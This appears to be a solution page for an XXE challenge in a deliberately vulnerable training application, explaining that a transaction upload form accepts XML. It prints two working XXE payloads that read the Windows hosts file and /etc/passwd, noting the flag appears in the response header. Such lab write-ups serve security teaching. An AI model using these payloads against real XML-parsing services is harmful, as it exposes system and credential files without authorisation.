Challenges
XXE
Depending on which OS the application is running, we can find different paths. For instance, if the application is running on the Windows server, we can for sure expect that there will be an available file in location C:/Windows/System32/drivers/etc/hosts
. On the other hand, if the app is running on Linux, then we can expect that file /etc/passwd
exists.
Solution
If you visit the transaction page, you will be able to see a form where you can upload transactions. This form requires an XML file format. If we upload a simple XXE sample, we will be able to see the output of specified paths.

If you are trying to get
C:/Windows/System32/drivers/etc/hosts
:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo
[
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts" >
]>
<foo>&xxe;</foo>
If you are trying to get
etc/passwd
:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo
[
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>
You will find the flag in the response header.
Last updated
Was this helpful?